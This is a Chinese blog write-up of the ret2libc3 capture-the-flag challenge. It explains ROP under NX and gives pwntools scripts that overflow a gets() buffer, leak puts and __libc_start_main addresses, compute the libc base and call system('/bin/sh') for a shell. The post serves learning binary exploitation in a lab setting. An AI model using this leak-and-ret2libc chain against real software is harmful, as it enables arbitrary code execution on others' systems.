【pwn】基础ROP攻击实战:ret2libc3

最新推荐文章于 2024-02-20 08:15:00 发布
最新推荐文章于 2024-02-20 08:15:00 发布
阅读量332 收藏 1
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ethan18/article/details/131646454
版权

【pwn】基础ROP攻击

这里用来记录一下关于PWN中ROP攻击的各种过程和经验

ROP攻击是针对那些使用了NX防护的程序,开启NX防护的程序使得栈以及堆上的代码没有办法被执行,导致不能单独将函数栈中的返回地址修改到函数帧中。

ROP主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。

讲起来还是很抽象,我的理解就是利用了函数帧中的返回地址,以及具有gadgets(也就是带着ret指令的一段汇编语句)都算是ROP攻击。这里我挑一个最经典的ROP作为实战

ret2libc3

文件链接如下:ret2libc3

下载好了后,在kali中打开,首先查看文件类型
在这里插入图片描述
发现NX保护开着,也就是栈不能用来作为执行代码

然后拖入ida pro中(注意是32位的ida pro),查看程序功能
在这里插入图片描述
发现了gets函数,并且字符串长度很明显大于在函数栈帧中具有的大小。表明具有字符串溢出漏洞

利用objdump工具以及ida逆向查看,发现程序中没有system函数(虽然题目里面就说过hh),动态链接库libc在程序中的映射(也就是plt表)中也没有system函数的存在,所以说我们找不到相关的函数。
在这里插入图片描述

但是,我们知道动态链接库libc是存在的,并且在动态链接的时候是一整个libc都链接到了最终的程序中,只是没有调用system函数导致我们的plt表没有记录。

所以我们只需要知晓其中某一个函数在plt表中被实现,我们就可以通过函数与函数之间的相对位置,找到存在于libc动态链接库中的system函数了

那么我们首先需要得到某一个存在于libc的函数在程序中的地址,这里我们选择puts函数和__libc_start_main函数(也没有什么理由,你想选别的也可以)

不过在这之前我们先看看输入变量s到栈顶的距离:
在这里插入图片描述
可以知道这个范围是给变量s使用的,具体过程我这里有点模糊,大家可以去找其他解析看看怎么找到的。反正我们知道这个范围是0x70,也就是112个字节。

我们构造代码:

from pwn import *

sh = process("./ret2libc3")		# 构成一个sh对象,用于发送指令

ret2libc3 = ELF("./ret2libc3")	# ELF对象获取程序信息

puts_plt = ret2libc3.plt['puts']	# plt表中的地址
libc_start_main = ret2libc3.got['__libc_start_main']	# got表中指向__libc_start_main的指针
start = ret2libc3.symbols['_start']		# 获取_start函数的地址
puts_got= ret2libc3.got['puts']		

sh.sendlineafter('Can you find it !?',flat(['a'*112, puts_plt, start, puts_got]))
put_addr = u32(sh.recv()[0:4])

print (f"put_addr is "+hex(put_addr))

sh.sendline(flat(['a'*112, puts_plt, start, libc_start_main]))
libc_start_main_addr = u32(sh.recv()[0:4])
print (f"libc_start_main_addr is "+hex(libc_start_main_addr))

在这里插入图片描述
得到了这两个的地址,动态链接时即使程序有 ASLR 保护,也只是针对于地址中间位进行随机,最低的 12 位并不会发生改变。也就是说此时在libc中最低的12位也保持一致。

我们使用libc database search
在这里插入图片描述
得到了system函数地址以及"/bin/sh"这一字符串地址

构造exp如下:

from pwn import *

sh = process("./ret2libc3")

ret2libc3 = ELF("./ret2libc3")

puts_plt = ret2libc3.plt['puts']
libc_start_main = ret2libc3.got['__libc_start_main']
start = ret2libc3.symbols['_start']
puts_got= ret2libc3.got['puts']

sh.sendlineafter('Can you find it !?',flat(['a'*112,puts_plt, start, puts_got]))
put_addr = u32(sh.recv()[0:4])

print (f"put_addr is "+hex(put_addr))

puts_libc = 0x74db0
sys_libc = 0x4c800
binsh_libc = 0x1b5faa

libc_base = put_addr -  puts_libc
system_addr = libc_base + sys_libc
binsh_addr =  libc_base + binsh_libc

sh.sendline(flat(['a'*112, system_addr, 'b'*4, binsh_addr]))
sh.interactive()

运行后获得弹窗

在这里插入图片描述
参考:
https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#3

ethanyi9
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ROP-基础-ret2libc3
ATFWUS的博客
02-29 2128
文件下载地址: 链接:https://pan.baidu.com/s/1IMZt9WIlXDZBX2J-hoCyNA 提取码:jrsx 0x01.分析 checksec: Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enab...
ret2libc3
m0_49959202的博客
08-06 374
文章目录ret2libc31.程序分析2.栈帧设计3.exp编写 ret2libc3 当前的ret2libc3:无system,无”\bin\sh“ 1.程序分析 首先file一下,发现是32位程序: checksec一下,发现没有开启pie ida分析程序: 发现有个See_something()函数可以用来泄露具体给定地址内的信息: main函数内还有个Print_message(),可以用来栈溢出: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SKJoX7
Wiki-ret2libc3
TedLau的博客
03-20 531
0x 00 前言 因为libc3里面没有自带的system函数,我的水平又比较低,之前的kali里面没有更新libc-database,导致以为是自己的kali系统的问题,所以一直就没有学这方面的内容,这次更新了ubuntu中的libc-database,从而使得这方面的题目可以正常运行了,所以就来学习了,我觉得正常的比赛中也是不常有带有system函数的,故打算写出来以加深印象。这周再学习...
pwn ——ret2libc3
qq_41696518的博客
07-06 809
ret2libc3
基本ROP之ret2libc3
至臻求学,胸怀云月
02-15 5021
ret2libc思路 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址。 ret2libc通常可以分为下面这几类: 程序中自身就含有system函数和"/bin/sh"字符串 程序中自身就有s...
好好说话之ret2libc3
hollk’s blog
06-22 1428
题目路径: /ctf-challenges/pwn/stackoverflow/ret2libc/ret2libc3 看一下C代码 #include <stdio.h> #include <stdlib.h> #include <time.h> char buf2[100]; void secure(void) { int secretcode, in...
栈溢出实例--笔记三(ret2libc
一只青木呀
08-07 1355
栈溢出实例--笔记三(ret2libc)1、栈溢出含义及栈结构2、ret2libc基本思路3、实战3.1、二进制程序如下3.2、查看栈结构3.3、第一次栈溢出3.4、第二次栈溢出 1、栈溢出含义及栈结构 请参考栈溢出实例–笔记一(ret2text) 栈溢出实例–笔记二(ret2shellcode) 2、ret2libc基本思路 在当一个程序开启了NX(栈不可执行)的时候,我们没办法去写shellcode,而且程序中也没有system函数供我们调用的时候,那此时我们该如何做呢? 首先,程序本身没有system
ret2libc2pwn 入门
02-11
pwn 入门
ret2libc1pwn 入门
02-11
pwn 入门
17ret2libc1_64 pwn 入门
02-11
pwn 入门
16ret2libc1_32 pwn 入门
02-11
pwn 入门
pwn07.ret2syscall例题
11-11
ret2syscall例题
Ret2libc
iextract的博客
04-24 654
昨晚同学问了关于ret2libc时参数布置的问题,今天在此记录 假设熟悉stack overflow Ps:ret2libc是为了对抗DEP/NX产生 栈的布置在说明ret2libc之前,栈的布置需要提前说明一下,以以下简单代码为例#include <stdio.h>int trap(int x) { int y=0; y+=x; return y; }int m
从零开始学逆向:理解ret2libc-3
最新发布
weixin_44626085的博客
02-20 1476
题目下载链接:https://pan.baidu.com/s/1wk3JFQBHgVZ0vjfnQk60Ug 提取码:0000。
2019.7.25 ret2libc3 填充从112遍为104
DSR446的博客
08-17 461
这道题目存在栈溢出,没有system函数,/bin/sh,需要我们自己泄露,解题思路跟前一篇博客的思路是一样的。讲一下怎么用libc的相对路径。 着重讲一下为什么开始的填充是112,后面填充变为了104。主要是程序为了对齐。我们可以用gdb来调试一下,来看看他变化的过程。 变化前: 变化后: 放exp: ...
ret2libc3地址泄露--pwn
weixin_44642009的博客
03-17 2684
练习三–ret2libc3地址泄露 在此实验前,我们从简到难实验了ret2libc1,ret2libc2两个实验,对getshell有了一定了解,基本学会了如何在有无system及/bin/sh函数的情况下获取权限,在此以实验二的名为pwn的可执行文件为入手点,进行getshell。 首先,对ret2libc3可执行文件进行检测, checksec ret2libc3 结果如图: 发现其不存...
适合新手的ret2libc3之路
Vicl1fe的博客
05-29 3872
roplibc3 做了一下这道题,感觉收获蛮大,写一篇博客,也方便自己记忆。 题目链接:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop/#3 参考链接:https://www.jianshu.com/p/5525dde00053 好了回归正题,首先拿到这个题目,ida打开按f5查看伪代码,看到了高危函数...
❤️超详细PWN新手入门教程❤️《二进制各种漏洞原理实战分析总结》
热门推荐
Test网络安全
09-15 1万+
本部分将对常见的二进制漏洞做系统分析,方便在漏洞挖掘过程中定位识别是什么类型漏洞,工欲善其事,必先利其器。 0x01栈溢出漏洞原理 栈溢出漏洞属于缓冲区漏洞的一种,实例如下: #include <stdio.h> #include <string.h> int main() { char *str = "AAAAAAAAAAAAAAAAAAAAAAAA"; vulnfun(str); return; } int vulnfun(char *st
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8335
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值